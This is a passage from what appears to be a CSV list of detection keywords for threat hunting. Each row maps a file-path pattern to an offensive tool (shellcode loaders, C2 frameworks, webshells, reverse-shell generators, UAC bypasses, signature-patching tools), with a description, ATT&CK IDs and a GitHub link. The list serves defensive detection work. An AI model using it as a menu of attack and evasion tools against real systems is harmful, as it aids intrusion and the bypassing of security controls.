over traditional C# tradecraft) only without using PowerShell in anyway","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","0","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*/shellcode.hpp*","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","1","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*/shellcode_excel*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/ShellCode_Loader*","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Axx8/ShellCode_Loader","1","1","N/A","10","10","389","49","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z" +"*/shellcode_samples/*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*/shellcode_sources/*","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","8796","2026","2023-09-30T17:06:35Z","2011-11-23T06:53:25Z" +"*/ShellcodeFluctuation*","offensive_tool_keyword","C2 related tools","An advanced in-memory evasion technique fluctuating shellcode's memory protection between RW/NoAccess & RX and then encrypting/decrypting its contents","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/mgeeky/ShellcodeFluctuation","1","1","N/A","10","10","770","143","2022-06-17T18:07:33Z","2021-09-29T10:24:52Z" +"*/Shellcode-Hide.git*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","1","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*/SHELLCODELOADER*","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","N/A","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","10","10","70","41","2023-09-28T09:00:55Z","2021-01-20T13:03:45Z" +"*/Shellcode-Loader.git*","offensive_tool_keyword","Shellcode-Loader","dynamic shellcode loading","T1055 - T1055.012 - T1027 - T1027.005","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/ReversingID/Shellcode-Loader","1","1","N/A","10","2","140","30","2023-09-08T06:55:34Z","2021-08-08T08:53:03Z" +"*/shellcodes/utils.py*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" +"*/shellcodetester*","offensive_tool_keyword","shellcodetester","This tools test generated ShellCodes","T1059.003 - T1059.005 - T1027.002","TA0002 - TA0005 - TA0040","N/A","N/A","POST Exploitation tools","https://github.com/helviojunior/shellcodetester","1","1","N/A","N/A","1","78","28","2023-04-24T22:34:25Z","2019-06-11T04:39:58Z" +"*/ShellGhost.git*","offensive_tool_keyword","ShellGhost","A memory-based evasion technique which makes shellcode invisible from process start to end","T1055.012 - T1027.002 - T1055.001","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/lem0nSec/ShellGhost","1","1","N/A","N/A","9","899","103","2023-07-24T12:22:32Z","2023-07-01T16:56:58Z" +"*/shellinject*","offensive_tool_keyword","deimosc2","DeimosC2 is a Golang command and control framework for post-exploitation.","T1573-001 - T1573-002 - T1572 - T1008 - T1071 - T1090-001 - T1090-004 - T1090-007","TA0011","N/A","N/A","C2","https://github.com/DeimosC2/DeimosC2","1","1","N/A","10","10","1004","158","2023-07-15T05:34:10Z","2020-06-30T19:24:13Z" +"*/ShellPop*","offensive_tool_keyword","ShellPop","Shellpop is all about popping shells. With this tool you can generate easy and sophisticated reverse or bind shell commands to help you during penetration tests.","T1059 - T1574 - T1055 - T1021","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/0x00-0x00/ShellPop","1","0","N/A","N/A","10","1393","237","2019-04-02T14:53:19Z","2018-03-08T03:58:00Z" +"*/Shells/shell.aspx*","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","247","56","2023-04-19T14:00:00Z","2021-10-19T07:49:17Z" +"*/Shells/shell.jsp*","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","247","56","2023-04-19T14:00:00Z","2021-10-19T07:49:17Z" +"*/Shells/shell.php*","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","247","56","2023-04-19T14:00:00Z","2021-10-19T07:49:17Z" +"*/Shells/shell.py*","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","247","56","2023-04-19T14:00:00Z","2021-10-19T07:49:17Z" +"*/Shells/shell.sh*","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","247","56","2023-04-19T14:00:00Z","2021-10-19T07:49:17Z" +"*/Shells/tomcat.war*","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","247","56","2023-04-19T14:00:00Z","2021-10-19T07:49:17Z" +"*/Shells/wordpress.zip*","offensive_tool_keyword","pyshell","PyShell is Multiplatform Python WebShell. This tool helps you to obtain a shell-like interface on a web server to be remotely accessed. Unlike other webshells the main goal of the tool is to use as little code as possible on the server side regardless of the language used or the operating system of the server.","T1059.001 - T1059.002 - T1059.005 - T1059.007","TA0002 - TA0003 - TA0009","N/A","N/A","Exploitation tools","https://github.com/JoelGMSec/PyShell","1","1","N/A","N/A","3","247","56","2023-04-19T14:00:00Z","2021-10-19T07:49:17Z" +"*/shellshock.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*/sherlocksecurity/*","offensive_tool_keyword","POC","POC and exploit tools on github","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/sherlocksecurity","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Shhmon/*","offensive_tool_keyword","shhmon","Neutering Sysmon via driver unload","T1518.001 ","TA0007","N/A","N/A","Defense Evasion","https://github.com/matterpreter/Shhmon","1","1","N/A","N/A","3","210","35","2022-10-13T16:56:41Z","2019-09-12T14:13:19Z" +"*/ShimsInstaller.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/shocknawe/*","offensive_tool_keyword","whiskeysamlandfriends","GoldenSAML Attack Libraries and Framework","T1606.002","TA0006","N/A","N/A","Credential Access","https://github.com/secureworks/whiskeysamlandfriends","1","1","N/A","N/A","1","54","11","2021-11-05T21:59:51Z","2021-11-04T15:30:12Z" +"*/shodan-api.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/shspawnas/*","offensive_tool_keyword","cobaltstrike","Cobaltstrike Bofs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Remote-OPs-BOF","1","1","N/A","10","10","600","99","2023-09-26T19:21:22Z","2022-04-25T16:32:08Z" +"*/ShuckNT.git*","offensive_tool_keyword","ShuckNT","ShuckNT is the script of Shuck.sh online service for on-premise use. It is design to dowgrade - convert - dissect and shuck authentication token based on Data Encryption Standard (DES)","T1552.001 - T1555.003 - T1078.003","TA0006 - TA0002 - TA0040","N/A","N/A","Credential Access","https://github.com/yanncam/ShuckNT","1","1","N/A","10","1","36","4","2023-02-02T10:40:59Z","2023-01-27T07:52:47Z" +"*/si1ent-le/CVE-2022-0847*","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/si1ent-le/CVE-2022-0847","1","1","N/A","N/A","1","0","2","2022-03-08T05:18:15Z","2022-03-08T04:51:02Z" +"*/SigFlip.*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*/sigflip.x64.*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*/sigflip.x86.*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*/SigFlip/*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*/SigLoader.go*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*/SigLoader/*","offensive_tool_keyword","C2 related tools","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*/SigLoader/*","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","885","165","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" +"*/signer-exe.py*","offensive_tool_keyword","PayGen","FUD metasploit Persistence RAT","T1587 T1048 T1588 T1102 T1041","N/A","N/A","N/A","RAT","https://github.com/youhacker55/PayGen","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/SilentClean.exe*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","0","N/A","10","10","174","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" +"*/SilentClean/SilentClean/*.cs*","offensive_tool_keyword","cobaltstrike","New UAC bypass for Silent Cleanup for CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/UAC-SilentClean","1","1","N/A","10","10","174","32","2021-07-14T13:51:02Z","2020-10-07T13:25:21Z" +"*/silentdump.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 